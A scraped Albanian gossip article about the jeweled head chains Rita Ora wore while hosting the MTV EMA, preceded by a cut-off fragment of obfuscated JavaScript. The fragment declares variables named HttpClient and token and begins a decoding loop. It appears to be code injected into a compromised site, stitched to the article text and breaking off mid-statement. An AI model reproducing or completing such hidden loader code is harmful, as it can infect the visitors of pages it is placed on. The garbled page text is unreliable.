;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kokë e fortë: Hidhini një sy bizhuterisë që Rita Ora mbajti në MTV EMA (FOTO)

By

Rita Ora shkëlqeu hiç më pak se në tetë veshje dhe stile flokësh si nikoqire e MTV Europe Music Awards, gjatë kësaj të diele mbrëma.

E nisi gjithçka me parakalim në tapetin e kuq, në një robëdhëshambër me të cilin dukej si sapo e dalë nga dushi, por kjo s’ishte pamja e saj finale që vodhi zemrat tona.

Këngëtarja nuk u ndal së transformuari gjatë kësaj mbrëmjeje, duke ndërruar jo vetëm veshjet, por edhe stilet e flokëve sa hap e mbyll sytë.

Pasi u shndërrua në karaktere më kontraverse, ajo nuk kishte rënë atë natë në sy, por sot mund të vërehet se çfarë bizhuterish kishte mbajtur në kokë.

Në njërën prej pamjeve, Rita e kishte stolisur kokën e saj, me zinxhirë me plot gurë në stil oriental.

Jo vetëm që këta aksesorë i kishte të shtrënguara në kokë, por përtej kësaj, asaj i vareshin në fytyrë edhe dy ornamente tjera, më të mëdhenj se vathët në stil shandanesh.

Shtrohet pyetja, si ia bëri Rita me tërë këto stoli në kokë? /Prive.al

Artikuj të ngjashëm